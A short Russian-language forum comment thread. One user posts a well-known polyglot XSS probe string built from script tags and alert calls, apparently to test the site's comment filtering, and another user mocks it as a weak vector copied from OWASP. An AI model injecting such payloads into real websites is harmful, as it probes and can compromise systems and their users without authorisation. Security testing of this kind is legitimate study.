Я поправил, так лучше будет проверять. '';!--"<XSS>=&{()} alert(String.fromCharCode(0,0,0))//';alert(String.fromCharCode(0,0,0))//";
alert(String.fromCharCode(0,0,0))//";alert(String.fromCharCode(0,0,0))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(0,0,0))</SCRIPT>[Url]>"';<script>alert("XSS")</script><!--<IMG SRC=nojavascript...alert("XSS")>
alert(String.fromCharCode(0,0,0))//";alert(String.fromCharCode(0,0,0))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(0,0,0))</SCRIPT>[Url]>"';<script>alert("XSS")</script><!--<IMG SRC=nojavascript...alert("XSS")>
раскрыть ветку (3)
я тоже умею заходить на сайт OWASP'a. Надо бы сказать, вектор этот паршивый. H1 сейчас вставлен для отвода глаз
раскрыть ветку (2)